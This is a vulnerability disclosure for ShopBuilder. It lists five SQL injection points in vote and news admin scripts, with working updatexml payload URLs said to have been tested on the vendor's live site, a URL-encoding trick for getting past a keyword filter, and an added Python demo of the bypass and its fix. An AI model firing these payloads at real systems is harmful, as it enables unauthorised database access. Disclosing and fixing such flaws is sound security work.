First, GET parameters do go through a filter.
That filter can be disregarded, though: URL-encoding the payload (e.g. %73elect in place of select, as in the test URLs below) is enough to get past it, so it does not stop any of the injections that follow.
#1
module\vote\admin\vote.php (reviewers, please read carefully: this is a different issue from the earlier report WooYun: ShopBuilder商城 v5.6.1 sql注入 #1, i.e. ShopBuilder v5.6.1 SQL injection #1)
Line 49
vid is not filtered
Tested against the vendor's site: http://www.a5shop.cn/?m=vote/admin&s=vote&vid=11%20and%201=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29
#2
module\vote\admin\vote_list.php
did is not filtered and is then used as id in the query
Tested against the vendor's site:
http://www.a5shop.cn/?m=vote/admin&s=vote_list&did=11%20and%201=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29
#3
module\news\admin\news.php
Line 92
newsid is not filtered
Tested against the vendor's site:
http://www.a5shop.cn/?m=news/admin&s=news&newsid=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29
#4
module\news\admin\newslist.php
At the top of the file
Tested against the vendor's site:
http://www.a5shop.cn/?m=news/admin&s=newslist&did=1%29%20and%201=updatexml%281,concat%280x5c,%28select%20user%28%29%29%29,1%29%23
#5
module\news\admin\newslist.php
Line 37
When nclass is non-empty and chk is an array, the values are passed straight into the database query
Tested against the vendor's site:
http://www.a5shop.cn/?m=news/admin&s=newslist&nclass=1&chk[]=1%29 and 1=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29%23
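To make the filter bypass described at the top and the vote.php vid case (#1) concrete, here is an added example written for this edit; it is not ShopBuilder's code. It assumes the GET filter is a keyword blacklist run over the raw, still percent-encoded query string while the script reads the already-decoded $_GET value, which is consistent with %73elect passing where select would not. The blacklist, the vote table and column names, and every function name are hypothetical. Alongside the vulnerable pattern it shows the fix a practitioner would want: validate vid as an integer and bind it as a query parameter.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumed mechanism (not taken from the ShopBuilder source): a keyword blacklist
# applied to the undecoded query string, while application code uses $_GET,
# which PHP has already percent-decoded.
BLACKLIST = re.compile(r"\b(select|union|insert|delete|drop)\b", re.IGNORECASE)

# Constructed request: the vote.php #1 payload from this report, with the literal
# space in "%73elect user" written as %20 the way a browser would send it.
QUERY_STRING = (
    "m=vote/admin&s=vote&vid=11%20and%201=updatexml%281,"
    "concat%280x5c,%28%73elect%20user%28%29%29%29,1%29"
)


def filter_blocks(raw_query_string):
    """Naive filter: looks for SQL keywords in the raw, still-encoded string."""
    return BLACKLIST.search(raw_query_string) is not None


def php_get(raw_query_string):
    """Approximates PHP's $_GET: percent-decoded, last value wins per key."""
    return {k: v[-1] for k, v in parse_qs(raw_query_string).items()}


def vulnerable_query(raw_query_string):
    """vote.php-style handling: filter the raw string, then concatenate vid."""
    if filter_blocks(raw_query_string):
        return None  # request rejected by the filter
    vid = php_get(raw_query_string)["vid"]
    return "SELECT * FROM vote WHERE vid=" + vid


def filter_after_decoding(raw_query_string):
    """Same blacklist, but applied to each decoded parameter value instead."""
    return any(filter_blocks(v) for v in php_get(raw_query_string).values())


def demo_db():
    """In-memory table standing in for the real vote table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE vote (vid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO vote VALUES (?, ?)", [(11, "poll-11"), (12, "poll-12")]
    )
    return conn


def safe_query(conn, raw_query_string):
    """Hardened handling: vid must be a non-negative integer and is bound."""
    vid = php_get(raw_query_string)["vid"]
    if not vid.isdigit():
        raise ValueError("vid must be an integer")
    cur = conn.execute("SELECT vid, title FROM vote WHERE vid = ?", (int(vid),))
    return cur.fetchall()


def safe_query_rejects(conn, raw_query_string):
    """True if the hardened handler refuses the request."""
    try:
        safe_query(conn, raw_query_string)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("raw filter blocks request:", filter_blocks(QUERY_STRING))
    print("query actually built:", vulnerable_query(QUERY_STRING))
    print("caught once decoded:", filter_after_decoding(QUERY_STRING))
    conn = demo_db()
    print("hardened, vid=11:", safe_query(conn, "m=vote/admin&s=vote&vid=11"))
    print("hardened rejects payload:", safe_query_rejects(conn, QUERY_STRING))
```

Running it shows the raw-string filter letting the encoded payload through while the assembled SQL already contains the decoded select user(); decoding before matching catches this particular payload, but the only robust fix is the integer check plus the bound parameter, which does not depend on guessing keywords at all.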